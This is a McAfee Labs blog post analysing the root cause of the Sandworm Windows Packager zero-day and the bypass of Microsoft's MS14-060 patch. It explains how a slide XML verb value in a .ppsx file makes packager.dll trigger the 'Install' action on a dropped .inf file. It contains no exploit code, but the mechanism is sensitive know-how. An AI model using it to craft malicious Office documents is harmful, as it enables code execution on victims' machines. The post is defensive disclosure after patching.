Bypassing Microsoft’s Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause By Haifei Li on Nov 11, 2014 On October 21, we warned the public that a new exploitation method could bypass Microsoft’s official patch (MS14-060, KB3000869) for the infamous Sandworm zero-day vulnerability. As Microsoft has finally fixed the problem today via Security Bulletin MS14-064, it’s time to uncover our findings and address some confusion. This is the first of two posts on this issue. (McAfee has already delivered various protections against this threat to our customers.) Sandworm background This zero-day attack was disclosed at almost the same time that the patch was available on the last “Patch Tuesday” (October 14). We found that this is a very serious zero-day attack not only because the attack targeted many sensitive organizations (such as NATO), but also from the technical properties of the vulnerability and exploitation. This vulnerability is a logic fault. It’s not related to memory corruption (such as a heap-based overflow or use-after-free) so proven-effective exploitation mitigations such as ASLR and DEP on Windows 7 or later will fail to block the exploit. Nor can Microsoft’s enhanced security tool Enhanced Mitigation Experience Toolkit (EMET) block the attack by default. Though the in-the-wild samples are organized as PowerPoint Show (.ppsx) files, this is due to a vulnerability in the Windows Packager COM object (packager.dll). Considering that COM objects are OS-wide function providers, any applications installed on the system can invoke them, which means that other formats can be attacks paths as well. This indicates that all Windows users, not only Office users, are at risk. The attack has been going on for quite a long time. For example, an exploit generator found on VirusTotal suggests that the vulnerability was discovered in June 2013. Microsoft’s patch and two bypasses On October 17, three days after its release, we found that Microsoft’s patch could be bypassed with some tricks. We reported our findings to Microsoft on the same day, which lead to an emergency Security Advisory 3010060, released October 21, with a temporary “Fix It.” We created a proof of concept (PoC) demonstrating the bypass. We later learned that some other parties, including the Google Security Team, have detected in-the-wild samples that are said to bypass the patch. We analyzed some samples in the wild, and found that they will trigger a user account control (UAC) warning when one logs in with a standard nonadministrator account. However, users on an administrator account or who have disabled the UAC will not see the warning, and the malicious code will execute automatically. Our PoC takes another path and does not trigger the UAC at all. Thus our PoC is a full bypass while the in-the-wild samples are a partial bypass. At the root The vulnerability exists in the Packager object. In fact, there are two issues rather than one. The first issue allows an attacker to drop an arbitrary file into the temp folder. (We warned the public about this security issue in a July post. Anyone who followed our advice at that time, preventing Office from invoking the Packager object, is immune to the Sandworm attack.) The second issue is the core of the matter. While the former allows only the writing of a file into the temp folder, the latter allows an attacker to “execute” the file from the temp folder. Let’s take a closer look at how it works. Looking at the slide definition XML file inside the .ppsx sample, we find something interesting at the following lines: The “verb” definition in slide1.xml. The Packager is an OLE object that supports embedding one file into another container application. As described on this MSDN page, OLE objects that provide embedding functions must expose the interface IOleObject. For the preceding XML definition, this calls the DoVerb() method of this IOleObject. Another MSDN page provides the prototype of this method: Prototype of the IOleObject::DoVerb() function. And the following shows the location of the IOleObject and the DoVerb() function in the packager.dll: The IOleObject interface and the DoVerb() function in packager.dll. The string “cmd=3? in the slide1.xml suggests that the value of the first parameter (iVerb) is 3. Depending on different values of iVerb, we see a switch to different code in IOleObject::DoVerb(). Following we have the REed code (source code generated through reverse engineering) when iVerb equals 3. The REed code for handling iVerb=3 in the IOleObject::DoVerb() function. With further research and testing, we realized that this code performs the same action as clicking the second item on the following menu after right-clicking the filename, as shown here. (The print in red is our addition.) The “right-click” menu for .inf file. Reading the whole code of IOleObject::DoVerb(), we see that depending on different values of iVerb, the code will switch to different code paths. We split them into two situations. For iVerb values greater than or equal to 3, the code will perform the same action as clicking on the pop-up menu. As we see in the REed code, it subtracts the fixed value 2 from the iVerb value 3, with the result 1, which represents the second item on the right-click menu. We can also invoke any command below “Install” on the menu by supplying a larger iVerb value. For example, if we want to click the third item on the preceding menu, we can set iVerb=4 (“cmd=4”) in the slide definition file. For an iVerb value less than 3, the program will follow other code that we have not shown. These actions, such as performing the default action (iVerb=2) or renaming the display name of the Packager object (iVerb=1), are handled well from a security point of view. We are focusing on the first situation: When the iVerb value is greater than or equal to 3, it will effectively click “Install” or a lower choice from the pop-up menu for the specific file. For a .inf file, the right-click menu will appear exactly as in our image for a default Windows setup. Thus, in this example “InfDefaultInstall.exe” will execute and various bad thing will happen. In this post, we have introduced the case and explained the essence of the vulnerability. In a second part, we will discuss the MS14-060 patch, how to bypass it, and more. Watch this space for our next post. Sursa: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous